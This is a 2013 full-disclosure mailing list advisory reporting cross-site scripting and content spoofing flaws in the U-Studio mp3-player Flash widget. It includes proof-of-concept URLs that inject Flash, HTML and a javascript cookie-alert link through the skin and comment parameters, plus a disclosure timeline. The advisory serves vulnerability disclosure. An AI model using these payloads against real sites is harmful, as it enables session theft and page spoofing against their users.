
Date: Sat, 12 Oct 2013 18:52:00 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Multiple vulnerabilities in mp3-player

Hello list!

These are Cross-Site Scripting and Content Spoofing vulnerabilities in 
mp3-player.

-------------------------
Affected products:
-------------------------

Vulnerable are mp3-player 2.5 and previous versions.

-------------------------
Affected vendors:
-------------------------

U-Studio
http://flv-mp3.com

----------
Details:
----------

XSS (via Flash Injection) (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=xss.swf

In old versions of Flash player the attack will work with flash file xss.swf 
at any domain, in new versions - only at the same domain.

Content Spoofing (Flash Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=http://site2/1.swf

Content Spoofing (Content Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3

Content Spoofing (HTML Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E

XSS (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=+%3Cimg%20src=%27xss.swf%27%3E

In old versions of Flash player the attack will work with flash file xss.swf 
at any domain, in new versions - only at the same domain.

XSS (Strictly social XSS) (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

------------
Timeline:
------------ 

2013.08.06 - informed developers.
2013.08.12 - announced at my site.
2013.10.11 - disclosed at my site (http://websecurity.com.ua/6698/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
